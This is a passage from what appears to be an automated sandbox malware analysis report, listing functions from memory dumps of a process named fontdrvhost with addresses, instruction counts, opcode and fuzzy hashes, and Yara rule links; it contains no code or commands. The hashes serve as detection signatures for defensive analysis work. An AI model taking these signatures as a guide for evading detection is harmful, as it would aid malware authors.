                                                                                                                    • Opcode ID: f7ff6c59a1bed29f0984c4c7fee7fb8f07e6351fa1748005db8a8a6c81803e01
                                                                                                                    • Instruction ID: 2fd54318f61ea46cb31b813bf61d90fa6c4107c462bf91fe556a8ab236d43d41
                                                                                                                    • Opcode Fuzzy Hash: f7ff6c59a1bed29f0984c4c7fee7fb8f07e6351fa1748005db8a8a6c81803e01
                                                                                                                    • Instruction Fuzzy Hash: 75215E31B1C6068BE678DE28D0E143973E5EF5E744B60163DDA8FC338ADE6CB8026651
                                                                                                                    Function 00007FFD3494B255 Relevance: .1, Instructions: 82COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000005.00000002.2232552546.00007FFD34940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34940000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_5_2_7ffd34940000_fontdrvhost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 0deafe1946f5cf9292baf1f3bf1d4cece4f57f8b4ca9a964a47bbe70eaea28a6
                                                                                                                    • Instruction ID: dd7e1116cbdd8fec5152e82b03e4866ae108d513b38dd1ace8383973236858a9
                                                                                                                    • Opcode Fuzzy Hash: 0deafe1946f5cf9292baf1f3bf1d4cece4f57f8b4ca9a964a47bbe70eaea28a6
                                                                                                                    • Instruction Fuzzy Hash: 51212C31A1C94E8FDB95DF58C8A05EDBBB1FF69310F10017AD10AE7295DA386941DB50
                                                                                                                    Function 00007FFD349483D5 Relevance: .1, Instructions: 81COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000005.00000002.2232552546.00007FFD34940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34940000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_5_2_7ffd34940000_fontdrvhost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: ac4dd3580c996790eb08a448dc478d2c8e811ad9681366ed88b8a57021054563
                                                                                                                    • Instruction ID: 2be7435e085c8d10f7de5f3c029c90eb73396346264803dff3ee3d11bef8fbcf
                                                                                                                    • Opcode Fuzzy Hash: ac4dd3580c996790eb08a448dc478d2c8e811ad9681366ed88b8a57021054563
                                                                                                                    • Instruction Fuzzy Hash: 50218335F2C6068BE6BCDA18C4A013972E5FF5A304B21057DD69FD3789DE2CB8026696
                                                                                                                    Function 00007FFD34946138 Relevance: .1, Instructions: 77COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000005.00000002.2232552546.00007FFD34940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34940000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_5_2_7ffd34940000_fontdrvhost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 160f74020228772666ee14c029e5e7b448c15014666484059337e3dca71b0248
                                                                                                                    • Instruction ID: 1b73f57aeea14d74e520eb96d154db7f2edae2b95523eeae5fa65b48f351b003
                                                                                                                    • Opcode Fuzzy Hash: 160f74020228772666ee14c029e5e7b448c15014666484059337e3dca71b0248
                                                                                                                    • Instruction Fuzzy Hash: 52213A74E1895E9FCB84DF98C4A09EDB7B1FF49300F50013AD10AE3291DA3DA9059B50
                                                                                                                    Function 00007FFD3494178D Relevance: .1, Instructions: 76COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000005.00000002.2232552546.00007FFD34940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34940000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_5_2_7ffd34940000_fontdrvhost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: c89e010bc2266d898f01a2e9b6c8cb8290c208c902a807eaccd14214630d150a
                                                                                                                    • Instruction ID: bda8b29a66082cda72846e4d73bcfa2b53ff171523a5f33f8591e59903293b42
                                                                                                                    • Opcode Fuzzy Hash: c89e010bc2266d898f01a2e9b6c8cb8290c208c902a807eaccd14214630d150a
                                                                                                                    • Instruction Fuzzy Hash: F021EA70E0895D8FDF99DB58C4AAAACB7B1FF69301F14016DC10EE7295CB35A881DB10
                                                                                                                    Function 00007FFD345546FE Relevance: .1, Instructions: 75COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000005.00000002.2228076213.00007FFD34550000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34550000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_5_2_7ffd34550000_fontdrvhost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: b3cae84655fbbdc49b8973b4cbcc2cd00feb06a5c9d2548d7c79b3379d52cc79
                                                                                                                    • Instruction ID: fbca84486fa941f6ec5ce1667ac8ef2a593731f53f5d5fe55dca1d01612adc23
                                                                                                                    • Opcode Fuzzy Hash: b3cae84655fbbdc49b8973b4cbcc2cd00feb06a5c9d2548d7c79b3379d52cc79
                                                                                                                    • Instruction Fuzzy Hash: 12218631E1C82E4EEB95EB1898A43B862E0FF47311F1401F9D54FE3292DE2CAC419740
                                                                                                                    Function 00007FFD34941869 Relevance: .1, Instructions: 71COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000005.00000002.2232552546.00007FFD34940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34940000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_5_2_7ffd34940000_fontdrvhost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 3c68131767bf49d2cef3fbfca3ee030b422b86e3f86851fcc1c6e7cd18fa22ce
                                                                                                                    • Instruction ID: 57cade49e07d053cbc68feaf870a53cbdc0e244dd61276854f773ad4b9a4e45c
                                                                                                                    • Opcode Fuzzy Hash: 3c68131767bf49d2cef3fbfca3ee030b422b86e3f86851fcc1c6e7cd18fa22ce
                                                                                                                    • Instruction Fuzzy Hash: 11210971E199099FDB9CDB58C4AAAADB7B1EF59310F0001BED10EE7395CE38A9408B50
                                                                                                                    Function 00007FFD34947C92 Relevance: .1, Instructions: 70COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000005.00000002.2232552546.00007FFD34940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34940000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_5_2_7ffd34940000_fontdrvhost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 12a9fbb0d8dc3fd93b328867bc4c7bf546f766189381797c31955e95fc344811
                                                                                                                    • Instruction ID: c0f7575fb76becd20b8f5c512773de06615ced984121f45e6418adc37495021f
                                                                                                                    • Opcode Fuzzy Hash: 12a9fbb0d8dc3fd93b328867bc4c7bf546f766189381797c31955e95fc344811
                                                                                                                    • Instruction Fuzzy Hash: F2214C71B1890E9BDB98DF68C4A1978F3A2FF45310B148279D51ED3686CF28BC12DB84
                                                                                                                    Function 00007FFD34944460 Relevance: .1, Instructions: 68COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000005.00000002.2232552546.00007FFD34940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34940000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_5_2_7ffd34940000_fontdrvhost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 9e6b790932fd363d2137c0866a0daea9c94ecafd036a70d1ae1a768246fbd11d
                                                                                                                    • Instruction ID: c799a92a586826f099e27ae78e0165374e46642d4e148ca6c692bba15c1e383d
                                                                                                                    • Opcode Fuzzy Hash: 9e6b790932fd363d2137c0866a0daea9c94ecafd036a70d1ae1a768246fbd11d
                                                                                                                    • Instruction Fuzzy Hash: 5311DA20E1C8A6C6FA68CA08C4F49B47391FF56305724467DD55FCB6CEC82CF981A7A0
                                                                                                                    Function 00007FFD34949810 Relevance: .1, Instructions: 68COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000005.00000002.2232552546.00007FFD34940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34940000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_5_2_7ffd34940000_fontdrvhost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 2cf901c119bc2487b935ea9c71f8cdd9f9b5d0fad98be6a60b63cae66704fe85
                                                                                                                    • Instruction ID: 4d9c953e63554d683341745107691afe8358f6a1ece5d8503285962dcbdebb19
                                                                                                                    • Opcode Fuzzy Hash: 2cf901c119bc2487b935ea9c71f8cdd9f9b5d0fad98be6a60b63cae66704fe85
                                                                                                                    • Instruction Fuzzy Hash: 4C11B710A1C46B46F628C72CC4F49B47395EFA6321B144A7DC64BCB78EC83CB885AF91
                                                                                                                    Function 00007FFD345508F8 Relevance: .1, Instructions: 68COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000005.00000002.2228076213.00007FFD34550000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34550000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_5_2_7ffd34550000_fontdrvhost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: cf4f3c26d9e1a3cdb7077d93d1b43c366cfb3a3d234172c17bd15baeda0a5078
                                                                                                                    • Instruction ID: f65b7aa88ae6db2ed1b5371c02c660e694a7f2af208ac021fe7cfefee94f3186
                                                                                                                    • Opcode Fuzzy Hash: cf4f3c26d9e1a3cdb7077d93d1b43c366cfb3a3d234172c17bd15baeda0a5078
                                                                                                                    • Instruction Fuzzy Hash: 8C014732F0D92C0B9629E11D989A936B3C2DBCBB3031512B9E98FC3245DC04FC1342C4
                                                                                                                    Function 00007FFD3494188E Relevance: .1, Instructions: 61COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000005.00000002.2232552546.00007FFD34940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34940000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_5_2_7ffd34940000_fontdrvhost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 918b64d0d6985c0bb0bbb4becc99a321822325785c5eb9818c0a4d1283a15c6a
                                                                                                                    • Instruction ID: c40872c36d615d6e681247596e82f3c510c828f727e8828bcff10d447a9f913f
                                                                                                                    • Opcode Fuzzy Hash: 918b64d0d6985c0bb0bbb4becc99a321822325785c5eb9818c0a4d1283a15c6a
                                                                                                                    • Instruction Fuzzy Hash: D4111930A185199FDF9CDB58C4A6ABDB7B1EF59310F4001BED20EE7295CE39A9408B50
                                                                                                                    Function 00007FFD34550C38 Relevance: .1, Instructions: 56COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000005.00000002.2228076213.00007FFD34550000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34550000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_5_2_7ffd34550000_fontdrvhost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: bd815eb342c61a54f8b1e067d986ca41bd09dc078b3195529399068b15cb370e
                                                                                                                    • Instruction ID: 68a2cf3d7062e43afe9f168fa23a47f636286c4a3ad883b0dcd8a65085a23ca7
                                                                                                                    • Opcode Fuzzy Hash: bd815eb342c61a54f8b1e067d986ca41bd09dc078b3195529399068b15cb370e
                                                                                                                    • Instruction Fuzzy Hash: 2C11E036F0D3898FE7139B6888A11ECBBB0EF43320F0444F6C246DB192D93C95069781
                                                                                                                    Function 00007FFD349429B5 Relevance: .1, Instructions: 55COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000005.00000002.2232552546.00007FFD34940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34940000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_5_2_7ffd34940000_fontdrvhost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 3a43edc641d2d6bf559a3553a556e701c521f6a741ad874393024939abc73c18
                                                                                                                    • Instruction ID: 51879daeabc11ced7e70138cae76b09d40d2d396342340613e024b7393189778
                                                                                                                    • Opcode Fuzzy Hash: 3a43edc641d2d6bf559a3553a556e701c521f6a741ad874393024939abc73c18
                                                                                                                    • Instruction Fuzzy Hash: 6111E172F1AA454FEB95FB6488A62AC77A0FF56300F18017DD04AC72D7DE6C6802C701
                                                                                                                    Function 00007FFD349460AD Relevance: .0, Instructions: 45COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000005.00000002.2232552546.00007FFD34940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34940000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_5_2_7ffd34940000_fontdrvhost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: e522e2342d1faa5a59cf94f6797c70c5e478346deceaa57dc7e7e1bee045801c
                                                                                                                    • Instruction ID: afe3301284727d43ec427863166a8a898c910652973e91d1786eec3bd8b20e88
                                                                                                                    • Opcode Fuzzy Hash: e522e2342d1faa5a59cf94f6797c70c5e478346deceaa57dc7e7e1bee045801c
                                                                                                                    • Instruction Fuzzy Hash: 30F0492544E2C44FC3029B74CC599A57FE0EF5721570A86EED089CB463C65D858B8711
                                                                                                                    Function 00007FFD34550C48 Relevance: .0, Instructions: 44COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000005.00000002.2228076213.00007FFD34550000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34550000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_5_2_7ffd34550000_fontdrvhost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: abce04f6ec817ef20ba15405221d8c0a04eb65a876f4afe015acf00f73c68742
                                                                                                                    • Instruction ID: c8ca762baac0f6633f509a5d35cb75a2d2d6a61e0e61dd9497dcc2788960ecc1
                                                                                                                    • Opcode Fuzzy Hash: abce04f6ec817ef20ba15405221d8c0a04eb65a876f4afe015acf00f73c68742
                                                                                                                    • Instruction Fuzzy Hash: 0F018C36E0D3899FEB12DB6888A11ADBFB0EF43310F1541F6C546DB192DA38AA459781
                                                                                                                    Function 00007FFD3455480A Relevance: .0, Instructions: 44COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000005.00000002.2228076213.00007FFD34550000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34550000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_5_2_7ffd34550000_fontdrvhost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 16b3bd16130e768ba094cc12b44608e4aeea13a0b9ef24a1628eacb523b298b7
                                                                                                                    • Instruction ID: 0fc1c6987d98866f6f5272180aaa86721700fd3067b0714d1ad267900c303c21
                                                                                                                    • Opcode Fuzzy Hash: 16b3bd16130e768ba094cc12b44608e4aeea13a0b9ef24a1628eacb523b298b7
                                                                                                                    • Instruction Fuzzy Hash: 53014632F1841A4EEA99FA2894A4AB862D1EF57312F0540F9D54FD3292DE2CEC429640
                                                                                                                    Function 00007FFD3494C0B2 Relevance: .0, Instructions: 39COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000005.00000002.2232552546.00007FFD34940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34940000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_5_2_7ffd34940000_fontdrvhost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: a7bae2e99ca6148a194da12b530755ed03a240f0eb8a633b3f082722fb147e5d
                                                                                                                    • Instruction ID: fc7e00232586448f8f9878501288de75a4e989b0571d569e4409158e3138cb44
                                                                                                                    • Opcode Fuzzy Hash: a7bae2e99ca6148a194da12b530755ed03a240f0eb8a633b3f082722fb147e5d
                                                                                                                    • Instruction Fuzzy Hash: 8FF0963184D3C59FEB16CB70C8A19E97FB4EF43214B1500FAD546C7192CA6C5546D771
                                                                                                                    Function 00007FFD34550C50 Relevance: .0, Instructions: 39COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000005.00000002.2228076213.00007FFD34550000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34550000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_5_2_7ffd34550000_fontdrvhost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 892e5a144909bd9726e107d0dbe8af3b2cf56560892a01709b867eacce0a53eb
                                                                                                                    • Instruction ID: 196fe939c5c074fb25afed9c0cc243a58f5dd6297d1f9dd2bf91e5a91f9f2dce
                                                                                                                    • Opcode Fuzzy Hash: 892e5a144909bd9726e107d0dbe8af3b2cf56560892a01709b867eacce0a53eb
                                                                                                                    • Instruction Fuzzy Hash: D7017C36E0D3899FEB12DB6888A11ADBFF0EF03310F1441F6C546DB192DA3C9A459742
                                                                                                                    Function 00007FFD34946F92 Relevance: .0, Instructions: 38COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000005.00000002.2232552546.00007FFD34940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34940000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_5_2_7ffd34940000_fontdrvhost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: e92198c2322d3103952c15a5441e8799f305ed6b4070eaa7c5e0506e82ab548d
                                                                                                                    • Instruction ID: 028b7c0d94231948e2616381a195e986c787a871b7d3b75f01d275ef130ad7e6
                                                                                                                    • Opcode Fuzzy Hash: e92198c2322d3103952c15a5441e8799f305ed6b4070eaa7c5e0506e82ab548d
                                                                                                                    • Instruction Fuzzy Hash: 6BF0C27188E3C59FD712CB70C8614D57FA4AF43214F1801FAD58AC71A2C92C695AD371
                                                                                                                    Function 00007FFD34941B62 Relevance: .0, Instructions: 38COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000005.00000002.2232552546.00007FFD34940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34940000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_5_2_7ffd34940000_fontdrvhost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: e6014d1dcff2955cadd33d5a8e447e2b19b4800dcb4eddb8ced945f6bed61d36
                                                                                                                    • Instruction ID: 981c9c3b4f930bd4f7c7ff6511fbf3557c05d4da4a1f7c30f1ec4d5cd607afa2
                                                                                                                    • Opcode Fuzzy Hash: e6014d1dcff2955cadd33d5a8e447e2b19b4800dcb4eddb8ced945f6bed61d36
                                                                                                                    • Instruction Fuzzy Hash: A6F0C23184E3C5AFD712CB70CCA65E97FA4AF43210B1801FAD145CB1A6DA6C560AD361
                                                                                                                    Function 00007FFD349434E0 Relevance: .0, Instructions: 37COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000005.00000002.2232552546.00007FFD34940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34940000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_5_2_7ffd34940000_fontdrvhost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 92bff6e6362093158100d36ec61c1bb0b736c5296c4140db16f56c429c9017cc
                                                                                                                    • Instruction ID: 59e9df3d90a7c822b8b64d4041d078c989dce35084066cd3c740594edf9d5160
                                                                                                                    • Opcode Fuzzy Hash: 92bff6e6362093158100d36ec61c1bb0b736c5296c4140db16f56c429c9017cc
                                                                                                                    • Instruction Fuzzy Hash: F4F0F421F2CA064BE6B9EB65C0B197B72E1BF59384B900939D08FC76D6DE2CF4059750
                                                                                                                    Function 00007FFD34948890 Relevance: .0, Instructions: 37COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000005.00000002.2232552546.00007FFD34940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34940000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_5_2_7ffd34940000_fontdrvhost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 9df2433c8f9147a6fe818f7e63bb87e90b1a349cdfff00f3c81407fd52f3c4f4
                                                                                                                    • Instruction ID: 9332affc85f708a05a83055b73bc5b462bcb42e99e9cc77009a807cff9cf0773
                                                                                                                    • Opcode Fuzzy Hash: 9df2433c8f9147a6fe818f7e63bb87e90b1a349cdfff00f3c81407fd52f3c4f4
                                                                                                                    • Instruction Fuzzy Hash: 46F03120F28E0A4BE6EDEF65C0A197662E2BF54345B800539D08FD76D6DE2CB8059780
                                                                                                                    Function 00007FFD345547D6 Relevance: .0, Instructions: 34COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000005.00000002.2228076213.00007FFD34550000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34550000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_5_2_7ffd34550000_fontdrvhost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 1a3e1c098371154e84161bfe5def8e367da0d0abf3e15046623435b37b434a1b
                                                                                                                    • Instruction ID: 725e1c6dd6cc0aac1253bbf2a3a863c7ed6ab184b6bc7d63c604cd3843254d03
                                                                                                                    • Opcode Fuzzy Hash: 1a3e1c098371154e84161bfe5def8e367da0d0abf3e15046623435b37b434a1b
                                                                                                                    • Instruction Fuzzy Hash: 59F05431F1C4294AEB95EA14D8A47B86391EF57312F1411F9D94FD31D2CE2CED835644
                                                                                                                    Function 00007FFD3494870E Relevance: .0, Instructions: 33COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000005.00000002.2232552546.00007FFD34940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34940000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_5_2_7ffd34940000_fontdrvhost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: aff44a740c3b94de874b7ecbc22b094e53ee23a1bcba428e9057c4502ad5a9e5
                                                                                                                    • Instruction ID: 4dd3355ee136088e54f292a9b91438ab30b9d330ed5ad5284969618513905475
                                                                                                                    • Opcode Fuzzy Hash: aff44a740c3b94de874b7ecbc22b094e53ee23a1bcba428e9057c4502ad5a9e5
                                                                                                                    • Instruction Fuzzy Hash: 9EF09A31718A068BE398DA08C0B57B673E2EB55340F20417DD92AC73D5DE6CA9418744
                                                                                                                    Function 00007FFD3494335E Relevance: .0, Instructions: 33COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000005.00000002.2232552546.00007FFD34940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34940000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_5_2_7ffd34940000_fontdrvhost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 803077e087645d4ab3794400b0261ceecf57b4ab667e177cdd41dd8cde191080
                                                                                                                    • Instruction ID: 479bb84629126e921bfb9289a41a382dd3722db1a891a4919745447ce8a9dacd
                                                                                                                    • Opcode Fuzzy Hash: 803077e087645d4ab3794400b0261ceecf57b4ab667e177cdd41dd8cde191080
                                                                                                                    • Instruction Fuzzy Hash: A8F09A317186028BF3A8DA68C0B57BA33D1FB59340F60023DD51AC77D4DE6CA8408780
                                                                                                                    Function 00007FFD349417A7 Relevance: .0, Instructions: 33COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000005.00000002.2232552546.00007FFD34940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34940000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_5_2_7ffd34940000_fontdrvhost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: b3992c8b04ccb2ad6b90a309688c48241b9f1944451c79240efad19fb1cab15b
                                                                                                                    • Instruction ID: a8a6733efa3891daa098fee2529c67f7ec90a8f56f2aa227c70ed914f7d6b449
                                                                                                                    • Opcode Fuzzy Hash: b3992c8b04ccb2ad6b90a309688c48241b9f1944451c79240efad19fb1cab15b
                                                                                                                    • Instruction Fuzzy Hash: D5F01F7090891D8FDF98DB98C895AACBBB1FB69301F10016D800AE7355CA35A841DF00
                                                                                                                    Function 00007FFD3455393E Relevance: .0, Instructions: 25COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000005.00000002.2228076213.00007FFD34550000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34550000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_5_2_7ffd34550000_fontdrvhost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 0fa61e1bc2d34c25b291fb6c8e3c7e53dd1c83a71e6d7df43dcb9f134149b047
                                                                                                                    • Instruction ID: 123808009c11d5a557de085a199ed20d2ce5a102e11fb63332ce15932f947fcf
                                                                                                                    • Opcode Fuzzy Hash: 0fa61e1bc2d34c25b291fb6c8e3c7e53dd1c83a71e6d7df43dcb9f134149b047
                                                                                                                    • Instruction Fuzzy Hash: 70F01531E080064BFB859684C8A0BFA37A4EF56300F1405B9DA4FE32C5DD2CE942AB09
                                                                                                                    Function 00007FFD349486E8 Relevance: .0, Instructions: 21COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000005.00000002.2232552546.00007FFD34940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34940000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_5_2_7ffd34940000_fontdrvhost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
